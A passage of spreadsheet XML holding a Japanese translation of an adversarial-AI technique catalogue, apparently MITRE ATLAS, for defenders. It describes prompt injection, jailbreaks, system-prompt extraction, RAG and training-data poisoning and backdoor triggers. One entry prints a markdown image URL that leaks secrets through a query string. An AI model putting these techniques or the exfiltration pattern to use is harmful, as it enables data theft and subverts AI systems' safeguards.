    <t>敵対者は、大規模言語モデル（LLM）のシステム プロンプトを抽出しようとする可能性があります。これは、モデルに独自のシステム プロンプトを表示させるプロンプト インジェクションによって実行される場合もあれば、設定ファイルから抽出される場合もあります。
システム プロンプトは AI プロバイダーの競争優位性の一部となる可能性があり、敵対者の標的となる可能性のある貴重な知的財産です。</t>
  </si>
  <si>
    <t>偽 RAG エントリ インジェクション</t>
  </si>
  <si>
    <t>敵対者は、被害者の検索拡張生成（RAG）データベースに偽のエントリを挿入する可能性があります。RAG データベースに取り込まれるデータソースには、RAG システムで使用される大規模言語モデル（LLM）によって文書として解釈されるように設計されたコンテンツが含まれます。偽の文書を含む RAG エントリを取得すると、LLM は検索コンテンツの一部を偽の RAG 結果として扱うように仕向けられます。
偽の RAG 文書を通常の RAG エントリ内に含めることで、データ監視ツールを回避します。また、文書が直接削除されることも防ぎます。
敵対者は、発見したシステム キーワードを使用して、特定の LLM にコンテンツを RAG エントリとして扱うように指示する方法を知る可能性があります。敵対者は、挿入したエントリのメタデータ（文書のタイトル、作成者、作成日など）を操作できる可能性があります。</t>
  </si>
  <si>
    <t>財務的損害</t>
  </si>
  <si>
    <t>財務的損害には、窃取、詐欺、偽造による富、財産、またはその他の金銭的資産の損失、または敵対者に資金を提供する圧力が含まれます。</t>
  </si>
  <si>
    <t>AI モデルへの完全なアクセス</t>
  </si>
  <si>
    <t>敵対者は、AI モデルへの完全な「ホワイト ボックス」アクセスを取得する可能性があります。これは、敵対者がモデル アーキテクチャー、そのパラメーター、およびクラス オントロジーに関する完全な知識を持っていることを意味します。敵対者は、モデルを持出して [敵対的データの作成](/techniques/AML.T0043) や [攻撃の検証](/techniques/AML.T0042) を行う可能性があり、その動作を検出するのは困難です。</t>
  </si>
  <si>
    <t>RAG インデックス化された対象の収集</t>
  </si>
  <si>
    <t>敵対者は、標的を絞りこむために、検索拡張生成（RAG）システムで使用されるデータソースを特定する可能性があります。これらのソースを特定することで、敵対者は AI が依存する外部データ リポジトリの改ざんや不正操作に集中することができます。
RAG インデックス化されたデータは、システムに関する公開文書内や、システムに直接アクセスし外部データソースの存在を示す兆候や参照を観察することでも特定できます。</t>
  </si>
  <si>
    <t>生成 AI</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）などの生成 AI モデルやツールを探し出し入手することで、様々な活動を支援する可能性があります。生成 AI は、マルウェアや攻撃的なサイバー スクリプトの生成、[検索コンテンツの作成](/techniques/AML.T0066)、[fフィッシング](/techniques/AML.T0052) コンテンツの生成など、様々な悪意ある方法で使用される可能性があります。
敵対者は、オープンソース モデルを入手したり、生成 AI サービスを利用したりする可能性があります。生成 AI モデルが生成できる応答の種類を制限する制約を回避するには、生成 AI モデルの脱獄が必要になる場合があります。また、生成 AI の利用規約に違反する必要がある場合もあります。</t>
  </si>
  <si>
    <t>ハードウェア</t>
  </si>
  <si>
    <t>敵対者は、ハードウェア サプライチェーンを妨害したり操作したりすることで AI システムを標的にする可能性があります。AI モデルは、GPU、TPU、組み込みデバイスなどの特殊なハードウェア上で実行されることが多いですが、CPU 上で動作するように最適化されている場合もあります。</t>
  </si>
  <si>
    <t>なりすまし</t>
  </si>
  <si>
    <t>敵対者は、信頼できる人物や組織になりすまし、標的を説得し、騙して自分に代わって何らかの行動を取らせる可能性があります。例えば、敵対者は、幹部、同僚、サードパーティ ベンダーなどの既知の送信者になりすまし、被害者とやりとりを行う可能性があります（[フィッシング](/techniques/AML.T0052)、または[LLM ソーシャル エンジニアリングによるスピア フィッシング](/techniques/AML.T0052.000)）。そして、確立された信頼関係を悪用し、敵対者は最終的な目的を達成するために、場合によっては複数の被害者を標的とします。
敵対者は、モデル リポジトリ、コンテナ レジストリ、ソフトウェア レジストリなど、AI DevOps ライフサイクルの一部であるリソースを標的とする可能性があります。</t>
  </si>
  <si>
    <t>間接（インジェクション）</t>
  </si>
  <si>
    <t>敵対者は、データベースやウェブサイトから取得したテキストやマルチメディアなど、LLM によって取り込まれた別のデータ チャネルを介して間接的にプロンプトを注入する可能性があります。これらの悪意のあるプロンプトは、ユーザーから隠蔽されたり難読化されたりする場合があります。この種類の注入は、敵対者がシステムへの足掛かりを得たり、システムの知らないユーザーを標的にしたりするために使用される可能性があります。</t>
  </si>
  <si>
    <t>学習データのメンバーシップ推論</t>
  </si>
  <si>
    <t>敵対者は、データ サンプルの学習データセット内のメンバーシップを推測する可能性があります。これにより、プライバシーに関する懸念が生じます。一部の戦略では、[レプリケーションによるプロキシの学習](/techniques/AML.T0005.001) で取得できるシャドウ モデルを使用し、その他の戦略ではモデル予測スコアの統計を使用します。
これにより、被害者モデルから、学習データセット内の個人情報やその他の保護された知的財産などの秘匿情報が漏洩する可能性があります。</t>
  </si>
  <si>
    <t>バックドア トリガーの挿入</t>
  </si>
  <si>
    <t>敵対者は、推論データにパーセプチュアル トリガーを追加する可能性があります。トリガーは、人間には知覚できないか、または明らかでない可能性があります。この手法は、[AI モデルの汚染](/techniques/AML.T0018.000) と組み合わせて使用され、敵対者は標的のモデルで目的の効果を生み出すことができます。</t>
  </si>
  <si>
    <t>AI モデルの反転</t>
  </si>
  <si>
    <t>AI モデルの学習データは、推論 API 経由で利用できる信頼スコアを悪用することで再構築できます。推論 API に対して戦略的にクエリーを行うことによって、敵対者は学習データ内に埋め込まれている可能性のある秘匿情報を取り出すことができます。敵対者がアルゴリズムで使用される機密情報を扱う機能のデータを再構築できる場合、プライバシー侵害につながる可能性があります。</t>
  </si>
  <si>
    <t>定期刊行物やカンファレンス議事録</t>
  </si>
  <si>
    <t>主要な機械学習カンファレンスや定期刊行物で受理される出版物の多くは、商業ラボからのものです。定期刊行物やカンファレンスの中にはオープン アクセスのものもありますが、アクセスや会員登録に料金がかかるものもあります。これらの出版物では、再現性に関する特定のアプローチのあらゆる側面が詳細に説明されていることがよくあります。この情報は、敵対者が論文の内容を実装するために使用できます。</t>
  </si>
  <si>
    <t>LLM からのデータ漏洩</t>
  </si>
  <si>
    <t>敵対者は、LLM に機密情報を漏洩させるプロンプトを作成する可能性があります。これには、個人のユーザー データやプロプラエタリー情報が含まれる場合があります。漏洩した情報は、プロプラエタリーな学習データ、LLM が接続されているデータ ソース、または LLM の他のユーザーからの情報から取得される可能性があります。</t>
  </si>
  <si>
    <t>LLM の脱獄</t>
  </si>
  <si>
    <t>敵対者は、LLM に設定された管理策、制限、またはガードレールを回避して、LLM をユーザー入力に自由に応答できる状態にするように設計され慎重に作成された [LLM プロンプト インジェクション](/techniques/AML.T0051) を使用する可能性があります。脱獄に成功すると、LLM は敵対者によって意図しない方法で使用される可能性があります。</t>
  </si>
  <si>
    <t>LLM プラグインの侵害</t>
  </si>
  <si>
    <t>敵対者は、大規模システムの一部である LLM へのアクセスを利用して、接続プラグインを侵害する可能性があります。LLM は、多くの場合、プラグインを介して他のサービスやリソースに接続され、機能を拡張します。プラグインには、他のアプリケーションとの統合、パブリックまたはプライベートなデータソースへのアクセス、コード実行機能などが含まれる場合があります。
これにより、敵対者は、統合されたアプリケーションやプラグインへの API 呼び出しを実行できるようになり、システム上での上位権限を利用できる可能性があります。
敵対者は、接続されたデータソースを利用して機密情報を取得する可能性があります。また、コマンドまたはスクリプト インタープリタと統合された LLM を使用して、任意の命令を実行する可能性もあります。</t>
  </si>
  <si>
    <t>LLM プロンプトの作成</t>
  </si>
  <si>
    <t>敵対者は、標的の生成 AI システムに関する知識を活用して、防御を回避し、悪意のある命令を実行できるプロンプトを作成する可能性があります。
敵対者は、プロンプトが常に意図通りに動作するように、プロンプトを反復的に変更する可能性があります。</t>
  </si>
  <si>
    <t>LLM プロンプト インジェクション</t>
  </si>
  <si>
    <t>敵対者は、LLM への入力として悪意のあるプロンプトを作成し、LLM が意図しない方法で動作するようにする可能性があります。これらの「プロンプト インジェクション」は、多くの場合、モデルが元の指示の側面を無視し、代わりに攻撃者の指示に従うように設計されています。
プロンプト インジェクションは、LLM への最初のアクセス ベクトルとなり、敵対者が作戦の他の手順を実行するための足掛かりを提供します。プロンプト インジェクションは、LLM の防御を回避するように設計されているか、攻撃者が特権コマンドを発行できるように設計されている可能性があります。プロンプト インジェクションの影響は、LLM との対話型セッション全体にわたって持続する可能性があります。
悪意のあるプロンプトは、LLM を利用して有害なコンテンツを生成するか、システムに足掛かりを築いてさらなる影響をもたらすために、攻撃者によって直接注入される可能性があります （[直接](/techniques/AML.T0051.000)）。LLM が通常の動作の一環として別のデータ ソースから読み込む際そのデータ ソースに悪意のあるプロンプトが存在しそれを取り込むときに、プロンプトが間接的に注入されることもあります （[間接](/techniques/AML.T0051.001)）。この種類の注入は、敵対者がシステムへの足掛かりとして、または LLM のユーザーを標的にするために使用される可能性があります。</t>
  </si>
  <si>
    <t>LLM プロンプトの難読化</t>
  </si>
  <si>
    <t>敵対者は、検出を回避するために、プロンプト インジェクションや検索コンテンツをユーザーから隠ぺいしたり、難読化したりする可能性があります。
これには、小さなテキスト、背景と同じ色のテキスト、非表示の HTML 要素など、インジェクションのレンダリング方法を変更することが含まれます。</t>
  </si>
  <si>
    <t>LLM プロンプトの自己複製</t>
  </si>
  <si>
    <t>敵対者は、LLM が出力の一部としてプロンプトを複製するように巧妙に細工された [LLM プロンプト インジェクション](/techniques/AML.T0051) を使用する可能性があります。これにより、プロンプトは他の LLM に伝播し、システム上に永続化されます。自己複製型のプロンプトは通常、他の悪意のある命令（例：[LLM の脱獄](/techniques/AML.T0054)、[LLM からのデータ漏洩](/techniques/AML.T0057)）と組み合わせて使用されます。</t>
  </si>
  <si>
    <t>LLM 応答のレンダリング</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）を利用して、ユーザーのクライアントがレスポンスをレンダリングする際にユーザーからは見えない秘匿情報と一緒に応答を返させるようにする可能性があります。そして、その秘匿情報は持出されます。これは、敵対者が管理するサーバーに自動的にリクエストを送信するレンダリング画像や、ユーザーの操作を必要とするクリック可能なリンクといった形で行われる可能性があります。
例えば、LLM は以下のようなマークダウンを生成する可能性があります。
```
![ATLAS](https://atlas.mitre.org/image.png?secrets=private_data)
```
これは、クライアントによって以下のようにレンダリングされます。
```
&lt;img src="https://atlas.mitre.org/image.png?secrets=private_data"&gt;
```
要求された画像をホストしている敵対者のサーバーがリクエストを受信すると、敵対者は `secrets` クエリ パラメータの内容を受け取ります。</t>
  </si>
  <si>
    <t>LLM からの信頼された出力コンポーネントの操作</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）へのプロンプトを利用して、応答の様々な構成要素を操作することで、ユーザーにとって信頼できるように見せかけることがあります。これにより、敵対者は、被害者の環境で活動を継続し、その環境とインタラクションするユーザーによる検知を回避できます。
LLM は、ユーザーにとってより信頼できるように言語を調整したり、ユーザーに特定の行動を取らせようと操作したりするよう指示される可能性があります。操作される可能性のあるその他の応答構成要素には、リンク、推奨されるフォローアップ アクション、取得文書のメタデータ、[引用](/techniques/AML.T0067.000) などがあります。</t>
  </si>
  <si>
    <t>悪意のあるパッケージ</t>
  </si>
  <si>
    <t>敵対者は、ユーザーがインポートすると有害な影響を及ぼす悪意のあるソフトウェア パッケージを開発する可能性があります。悪意のあるパッケージは、ユーザーの予想通りに動作する可能性があります。また、[AI サプライチェーンの侵害](/techniques/AML.T0010) を通じて導入される場合もあります。ユーザーにとって明らかに悪意のあるパッケージとは見なされず、AI 関連のタスクに役立つように見える場合もあります。</t>
  </si>
  <si>
    <t>AI モデルの操作</t>
  </si>
  <si>
    <t>敵対者は、AI モデルを直接操作してその動作を変更したり、悪意のあるコードを導入したりする可能性があります。モデルを操作することで、敵対者は、システムに永続的な変更を加えることができます。これには、重みを変更してモデルを汚染する、モデル アーキテクチャを改変して動作を変更する、モデルの読み込み時に実行される可能性のあるマルウェアを埋め込むなどが含まれます。</t>
  </si>
  <si>
    <t>手動による変更</t>
  </si>
  <si>
    <t>敵対者は、入力データを手動で変更して敵対的データを作成する可能性があります。敵対者は、標的のモデルに関する知識を使用して、モデルがタスクを実行するのに役立つと思われるデータの一部を変更する可能性があります。敵対者は、敵対的入力が機能することを確認できるまで試行錯誤する可能性があります。</t>
  </si>
  <si>
    <t>マスカレード</t>
  </si>
  <si>
    <t>敵対者は、自身のアーティファクトの機能を操作し、ユーザーやセキュリティ ツールに対して正当または無害であるように見せかけようとする場合があります。マスカレードとは、防御や監視を回避するために、オブジェクトの名前や場所（正当か悪意があるかは問いません）が操作または悪用される場合に発生します。これには、ファイルのメタデータを操作したり、ユーザーにファイルの種類を誤認させたり、正当なタスク名やサービス名を偽装したりすることが含まれます。</t>
  </si>
  <si>
    <t>モデル（注: 原文では Model）</t>
  </si>
  <si>
    <t>AI 対応のシステムは、さまざまな方法でオープンソース モデルに依存することがよくあります。最も一般的な点は、被害者組織がこれらのモデルを微調整に使用していることです。これらのモデルは外部ソースからダウンロードされ、その後、より小規模なプライベート データセットで調整されるモデルのベースとして使用されます。モデルの読み込みには、保存されたモデル ファイルの形式で保存されたコードを実行する必要があることがよくあります。これらは、従来のマルウェアや敵対的な AI 手法によって侵害される可能性があります。</t>
  </si>
  <si>
    <t>モデル（注: 原文では Models）</t>
  </si>
  <si>
    <t>敵対者は、公開モデルを入手して、それを攻撃活動に使用する場合があります。
敵対者は、被害者組織が使用するモデル、または被害者組織が使用するモデルを代表するモデルを探す場合があります。
代表するモデルには、モデル アーキテクチャー、またはアーキテクチャーやデータセットの学習のモデル パラメータを定義する事前学習済みモデルが含まれます。
敵対者は、YAML または Python 構成ファイルなどの一般的なモデル アーキテクチャーの構成ファイル形式、および ONNX (.onnx)、HDF5 (.h5)、Pickle (.pkl)、PyTorch (.pth)、TensorFlow (.pb、.tflite) などの一般的なモデルのストレージ ファイル形式を公開ソースで検索する場合があります。
取得したモデルは、敵対者の攻撃活動の高度化に役立ち、攻撃を被害者のモデルに合わせて調整するために頻繁に使用されます。</t>
  </si>
  <si>
    <t>AI モデルのアーキテクチャの改変</t>
  </si>
  <si>
    <t>敵対者は、AI モデルのアーキテクチャを直接改変し、その動作を再定義する可能性があります。これには、レイヤーの追加や削除、前処理や後処理の追加などが含まれます。
その影響としては、特定のクラスの予測能力の喪失、誤った演算の追加による計算コストの増加、パフォーマンスの低下などが挙げられます。さらに、敵対者が定義した別のネットワークを計算グラフに注入することで、入力に基づいて動作を変更し、事実上バックドアを作成することも可能になります。</t>
  </si>
  <si>
    <t>機能の獲得</t>
  </si>
  <si>
    <t>敵対者は、自らの活動に使用するソフトウェア機能を検索して取得する場合があります。その機能は、AI ベースの攻撃に固有のものである場合（[AI への敵対的な攻撃の実装](/techniques/AML.T0016.000)）や、悪意のある目的で再利用された汎用ソフトウェア ツール（[ソフトウェア ツール](/techniques/AML.T0016.001)）があります。どちらの場合も、敵対者は特定の AI 対応システムを標的にするために機能を変更またはカスタマイズする可能性があります。</t>
  </si>
  <si>
    <t>フィッシング</t>
  </si>
  <si>
    <t>敵対者は、被害者のシステムにアクセスするためにフィッシング メッセージを送信することがあります。すべてのフィッシング形態は、電子的に配信されるソーシャル エンジニアリングです。フィッシングは標的を絞ったものになる可能性があり、これをスピア フィッシングと呼びます。スピア フィッシングでは、特定の個人、企業、または業界が攻撃者の標的になります。より一般的には、敵対者は、大量のマルウェア スパム キャンペーンなど、標的を絞らないフィッシングを実行することができます。
合成テキスト、顔のビジュアル ディープフェイク、会話のオーディオ ディープフェイクを生成する LLM などの生成 AI により、敵対者は標的を絞ったフィッシング キャンペーンを拡大できます。LLM は、テキスト会話を介してユーザーと対話でき、機密情報をフィッシングするためのメタ プロンプトをプログラムできます。ディープフェイクは、フィッシングの補助としてなりすましに使用できます。</t>
  </si>
  <si>
    <t>物理的な対抗手段</t>
  </si>
  <si>
    <t>敵対者は、攻撃を補助または支援するために、物理的な対抗手段を入手または製造する可能性があります。
これらの構成要素は、ステッカーや T シャツに印刷された敵対的なパターン、変装、おとりなど、モデルを妨害または劣化させるために使用される可能性があります。また、レーザー ポインター、電球、その他のツールなど、データ収集に使用されるセンサーを妨害または劣化させるために使用される可能性もあります。</t>
  </si>
  <si>
    <t>物理環境へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、純粋にデジタル領域で行われる攻撃に加えて、物理環境を攻撃に悪用する可能性もあります。モデルが何らかの方法で現実世界から収集されたデータとやり取りしている場合、敵対者はデータが収集されている場所にアクセスすることでモデルに影響を与えることができます。収集プロセスでデータを改変することで、敵対者はデジタル アクセス用に設計された攻撃の修正版を実行できます。</t>
  </si>
  <si>
    <t>AI モデルの汚染</t>
  </si>
  <si>
    <t>敵対者は、AI モデルの重みを操作して動作や性能を変更し、モデルを汚染する可能性があります。敵対者は、重みを直接操作したり、汚染されたデータでモデルを学習させたり、モデルをさらに微調整したり、その他の方法で学習プロセスに干渉したりすることで、モデルを汚染する可能性があります。
汚染されたモデルの動作の変化は、予測 AI モデルの場合は特定のカテゴリに限定され、生成 AI モデルの場合は特定のトピックや概念、事実に限定されるか、全体的なパフォーマンスの低下を狙う可能性があります。</t>
  </si>
  <si>
    <t>学習データの汚染</t>
  </si>
  <si>
    <t>敵対者は、基盤となるデータまたはそのラベルを変更することで、AI モデルで使用されるデータセットを汚染しようとする可能性があります。これにより、敵対者は、簡単には検出できない可能性のあるデータを学習した AI モデルに脆弱性を埋め込むことができます。データ汚染攻撃では、ラベルの変更が必要な場合とそうでない場合があります。埋め込まれた脆弱性は、後で [バックドア トリガーの挿入](/techniques/AML.T0043.004) を含むデータ サンプルによってアクティブ化されます。
汚染されたデータは [AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入されるか、敵対者がシステムへの [初期アクセス](/tactics/AML.TA0004) を取得した後に汚染される可能性があります。</t>
  </si>
  <si>
    <t>プレプリント リポジトリ</t>
  </si>
  <si>
    <t>arXiv などのプレプリント リポジトリには、査読されていない最新の学術研究論文が含まれています。定期刊行物やカンファレンス議事録には、通常掲載されない研究ノートや技術レポートが含まれている場合があります。プレプリント リポジトリは、定期刊行物に受理された論文を共有する中心的な場所としても機能します。プレプリント リポジトリーを検索すると、敵対者は被害者組織の研究者が取り組んでいる比較的最新の情報を得ることができます。</t>
  </si>
  <si>
    <t>幻覚化されたエンティティの公開</t>
  </si>
  <si>
    <t>敵対者は、LLM によって幻覚化された情報源に、ソフトウェア パッケージ、ウェブサイト、メール アドレスなど、自らが管理するエンティティを作成することがあります。幻覚は、パッケージ名、コマンド、URL、企業名、メール アドレスといった形で提示され、敵対者が管理するエンティティへと被害者を誘導します。敵対者が管理するエンティティと被害者がやり取りすることで、攻撃が進行します。</t>
  </si>
  <si>
    <t>汚染済みデータセットの公開</t>
  </si>
  <si>
    <t>敵対者は [学習データの汚染](/techniques/AML.T0020) を行い、それを公共の場所に公開する可能性があります。汚染されたデータセットは、新しいデータセットの場合もあれば、既存のオープン ソース データセットの汚染された亜種の場合もあります。このデータは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) を介して被害者のシステムに導入される可能性があります。</t>
  </si>
  <si>
    <t>汚染済みモデルの公開</t>
  </si>
  <si>
    <t>敵対者は、モデル レジストリやコード リポジトリなどの公開場所に、改ざんされたモデルを公開する可能性があります。改ざんされたモデルは、新しいモデルの場合もあれば、既存のオープンソース モデルの改ざんされた亜種である場合もあります。このモデルは、[AI サプライチェーンの侵害](/techniques/AML.T0010)を通じて被害者のシステムに導入される可能性があります。</t>
  </si>
  <si>
    <t>RAG の汚染</t>
  </si>
  <si>
    <t>敵対者は、検索拡張生成（RAG）システムによってインデックス化されたデータに悪意のあるコンテンツを挿入し、RAG ベースの検索結果を通じて将来のスレッドを汚染する可能性があります。これは、RAG がインデックス化する場所に操作された文書を配置することで実現されます（[RAG インデックス化された対象の収集](/techniques/AML.T0064) を参照）。
コンテンツは、特定のユーザー クエリに対して常に検索結果に表示されるように標的を絞られる可能性があります。敵対者のコンテンツには、虚偽または誤解を招く情報が含まれる可能性があります。また、悪意のある指示や偽の RAG エントリを含むプロンプト インジェクションも含まれる可能性があります。</t>
  </si>
  <si>
    <t>風評被害</t>
  </si>
  <si>
    <t>風評被害は、組織に対する公衆の認知と信頼の低下を伴います。評判が傷つけられる事件の例としては、スキャンダルやなりすましなどが挙げられます。</t>
  </si>
  <si>
    <t>検索コンテンツの作成</t>
  </si>
  <si>
    <t>敵対者は、ユーザーのクエリによって検索されることを意図したコンテンツを作成し、システムのユーザーに何らかの影響を与える可能性があります。これは、ユーザーがシステムに対して抱いている信頼を悪用するものです。
細工されたコンテンツは、プロンプト インジェクションと組み合わせられる可能性があります。また、別の文書や電子メールに単独で存在する場合もあります。敵対者は、細工されたコンテンツを、検索拡張生成（RAG）システムで使用されるベクトル データベースなどの被害者のデータベースに取り込む必要があります。これは、サイバー アクセス、または RAG システムに共通する取り込み機構の悪用によって実現される可能性があります（[RAG の汚染](/techniques/AML.T0070) を参照）。
敵対者がコンテンツを作成するための補助として、大規模言語モデルが使用される可能性があります。</t>
  </si>
  <si>
    <t>リバース シェル</t>
  </si>
  <si>
    <t>敵対者は、リバース シェルを利用して、標的のシステムと通信し、制御する可能性があります。
通常、ユーザーはクライアントを使用して、接続を待機しているリモート マシンに接続します。リバース シェルを使用すると、敵対者は標的のシステムから開始される着信接続を待機します。</t>
  </si>
  <si>
    <t>アプリケーション リポジトリの検索</t>
  </si>
  <si>
    <t>敵対者は、標的を定める際に、公開されているアプリケーション リポジトリーを検索する場合があります。例としては、Google Play、iOS App Store、macOS App Store、Microsoft Store などがあります。
敵対者は、AI 対応のコンポーネントを含むアプリケーションを探す検索クエリーを作成する場合があります。多くの場合、次のステップは [公開されている AI アーティファクトの取得](/techniques/AML.T0002) です。</t>
  </si>
  <si>
    <t>AI の脆弱性に関する公開されている分析結果の検索</t>
  </si>
  <si>
    <t>[公開されている技術データベースの検索](/techniques/AML.T0000) と同様に、一般的な AI モデルの脆弱性については十分な研究が利用可能であることがよくあります。標的が特定されると、敵対者はこのクラスのモデルに対して行われた既存の研究を特定しようとする可能性があります。
これには、成功した攻撃の詳細を特定できる学術論文を読むだけでなく、それらの攻撃の既存の実装を特定することも含まれます。敵対者は、必要に応じて、[AI への敵対的攻撃の実装](/techniques/AML.T0016.000) を入手したり、独自の [AI への敵対的攻撃](/techniques/AML.T0017.000) を開発したりする可能性があります。</t>
  </si>
  <si>
    <t>公開されている技術データベースの検索</t>
  </si>
  <si>
    <t>敵対者は、公開されている研究や技術文書を検索して、被害者組織内における AI の使用方法と使用場所を知る可能性があります。敵対者はこの情報を使用して、攻撃の標的を特定したり、既存の攻撃をカスタマイズしてより効果的にしたりできます。組織は、多くの場合、実稼働環境で追加のプロプラエタリーなデータを学習したオープンソースのモデル アーキテクチャを使用します。この基礎となるアーキテクチャの知識により、敵対者はより現実的なプロキシー モデルを作成できます （[プロキシー AI モデルの作成](/techniques/AML.T0005)）。敵対者は、これらのリソースを検索して、被害者組織で雇用されている著者の出版物を探すことができます。
研究資料は、[定期刊行物およびカンファレンス議事録](/techniques/AML.T0000.000) に公開された学術論文として存在する場合もあれば、[プレプリント リポジトリ](/techniques/AML.T0000.001) や [技術ブログ](/techniques/AML.T0000.002) に保存されている場合もあります。</t>
  </si>
  <si>
    <t>被害者が所有するウェブサイトの検索</t>
  </si>
  <si>
    <t>敵対者は、標的を絞る際に使用できる情報を求めて、被害者が所有するウェブサイトを検索する場合があります。被害者が所有するウェブサイトには、AI 対応の製品やサービスに関する技術的な詳細が含まれている場合があります。被害者が所有するウェブサイトには、部署/部門の名前、物理的な場所、主要な従業員に関するデータ（名前、役割、連絡先情報など）など、さまざまな詳細が含まれている場合があります。これらのサイトには、事業運営や事業上の関係を強調する詳細も含まれている場合があります。
敵対者は、被害者が所有するウェブサイトを検索して、実用的な情報を収集する場合があります。
この情報は、敵対者が攻撃をカスタマイズするのに役立つ場合があります（例: [AI への敵対的攻撃](/techniques/AML.T0017.000) または [手動による変更](/techniques/AML.T0043.003)）。
これらのソースからの情報により、他の形態の偵察ができる可能性が明らかになる場合があります（例: [公開されている技術データベースの検索](/techniques/AML.T0000) または [AI の脆弱性に関する公開されている分析結果の検索](/techniques/AML.T0001)）。</t>
  </si>
  <si>
    <t>サーバーレス</t>
  </si>
  <si>
    <t>敵対者は、Cloudflare Workers、AWS Lambda 関数、Google Apps Scripts といったサーバーレス クラウド インフラストラクチャを購入・構成し、標的の絞り込みに利用することがあります。サーバーレス インフラストラクチャを利用することで、敵対者は、攻撃活動中に使用したインフラストラクチャを特定しにくくすることができます。
サーバーレスのランタイム環境を入手すれば、感染したマシンに直接応答したり、敵対者が所有するコマンド＆コントロール サーバーへのトラフィックをプロキシしたりすることができます。これらの機能によって生成されるトラフィックは、一般的なクラウド プロバイダーのサブドメインから送信されているように見えるため、これらのプロバイダーへの通常のトラフィックと区別することが困難になる可能性があります。これは、任意の場所からのコンテンツの取得を阻止するコンテンツ セキュリティ ポリシーを回避するために利用される可能性があります。</t>
  </si>
  <si>
    <t>社会的損害</t>
  </si>
  <si>
    <t>社会的損害は、子供が下品なコンテンツにさらされるなど、一般大衆または特定の脆弱なグループに影響を及ぼすような有害な結果を生み出す可能性があります。</t>
  </si>
  <si>
    <t>ソフトウェア ツール</t>
  </si>
  <si>
    <t>敵対者は、自らの作戦を支援するソフトウェア ツールを探して入手する場合があります。正当な使用のために設計されたソフトウェアが、敵対者によって悪意を持って再利用される可能性があります。敵対者は、目的を達成するためにソフトウェア ツールを変更またはカスタマイズする場合があります。AI システムへの攻撃を支援するために使用されるソフトウェア ツールは、必ずしも AI ベースであるとは限りません。</t>
  </si>
  <si>
    <t>AI システムに対するチャフ データを使用したスパム攻撃</t>
  </si>
  <si>
    <t>敵対者は、検出数の増加を引き起こすチャフ データで AI システムをスパム攻撃する可能性があります。これにより、被害者組織のアナリストは、誤った推論をレビューして修正するために時間を浪費する可能性があります。</t>
  </si>
  <si>
    <t>LLM ソーシャル エンジニアリングによるスピア フィッシング</t>
  </si>
  <si>
    <t>敵対者は LLM を標的型ソーシャル エンジニアに変えることがあります。LLM は、テキスト会話を通じてユーザーとやり取りできます。LLM は、敵対者から指示を受けてユーザーから機密情報を入手し、効果的なソーシャル エンジニアとして行動することができます。LLM は、敵対者が定義した特定のペルソナを標的にすることができます。これにより、敵対者はスピア フィッシング攻撃を拡大し、個人を標的にして特権システムの資格情報などの秘匿情報を漏洩させることができます。</t>
  </si>
  <si>
    <t>特殊文字セット</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデルで使用される区切り文字や特殊文字セットを探索する可能性があります。例えば、検索拡張生成アプリケーションでコンテキストとユーザー プロンプトを区別するために使用される区切り文字などです。これらの文字は、後に大規模言語モデルを混乱させたり、不正な動作をさせたりするために悪用される可能性があります。</t>
  </si>
  <si>
    <t>機能のステージング</t>
  </si>
  <si>
    <t>敵対者は、標的の絞り込みに使用できる機能をアップロード、インストール、またはその他の方法でセットアップする場合があります。敵対者は、自身の作戦を支援するために、開発（[機能の開発](/techniques/AML.T0017)）または取得（[機能の獲得](/techniques/AML.T0016)）した機能を持ち込み、自らの管理下にあるインフラストラクチャ上にステージングする必要がある場合があります。これらの機能は、敵対者が以前に購入またはレンタルしたインフラストラクチャ（[インフラストラクチャの獲得](/techniques/AML.T0008)）、または何らかの方法で侵害されたインフラストラクチャ上にステージングされる可能性があります。また、GitHub などの Web サービス、Hugging Face などのモデル レジストリ、コンテナ レジストリ上にステージングされる可能性もあります。
敵対者は、汚染済みデータセット（[汚染済みデータセットの公開](/techniques/AML.T0019)）、悪意のあるモデル（[汚染済みモデルの公開](/techniques/AML.T0058))、プロンプト インジェクションなどの様々なアーティファクトをステージングする可能性があります。正規の企業名や製品名を標的にしたり、タイポ スクワッティングを行ったり、幻覚を利用したり（LLM の幻覚の探索](/techniques/AML.T0062)) する場合もあります。</t>
  </si>
  <si>
    <t>システム命令に関するキーワード</t>
  </si>
  <si>
    <t>敵対者は、関数名やオブジェクト名など、大規模言語モデル（LLM）にとって特別な意味を持つキーワードを探索する可能性があります。これらのキーワードは、LLM を混乱させたり操作したりして不正な動作をさせたり、LLM がアクセスできるプラグインを呼び出したりするために悪用される可能性があります。</t>
  </si>
  <si>
    <t>システム プロンプト</t>
  </si>
  <si>
    <t>敵対者は、AI システムの構築者によって提供される大規模な言語モデルのシステム命令を探索し、システムの機能について学習してガードレールを回避する可能性があります。</t>
  </si>
  <si>
    <t>技術ブログ</t>
  </si>
  <si>
    <t>学術機関の研究室や企業の研究開発部門には、機械学習の使用法や組織固有の問題への応用を紹介するブログがよくあります。個々の研究者も、ブログ投稿で自身の研究成果を文書化することがよくあります。敵対者は、標的の被害者組織またはその従業員が作成した投稿を検索する場合があります。[定期刊行物およびカンファレンス議事録](/techniques/AML.T0000.000)や[プレプリント リポジトリ](/techniques/AML.T0000.001) と比較すると、この資料には AI システムのより実用的な側面が含まれていることがよくあります。これには、使用されている基礎技術やフレームワーク、API アクセスやユースケースに関する情報が含まれる場合があります。これにより、敵対者は、その組織内部での AI の使用方法や、攻撃のカスタマイズに役立つ可能性のあるアプローチの詳細をよりよく理解できるようになります。</t>
  </si>
  <si>
    <t>収集した AI アーティファクトによるプロキシーの学習</t>
  </si>
  <si>
    <t>プロキシー モデルは、敵対者が収集した標的のモデルを代表する AI アーティファクト（データ、モデル アーキテクチャ、事前学習済みモデルなど）から学習を行う場合があります。これは、敵対者が利用できるよりも高いレベルのアクセスを必要とする攻撃を開発する目的で、または標的のモデルと対話せずに既存の攻撃を検証する手段として使用できます。</t>
  </si>
  <si>
    <t>レプリケーションによるプロキシーの学習</t>
  </si>
  <si>
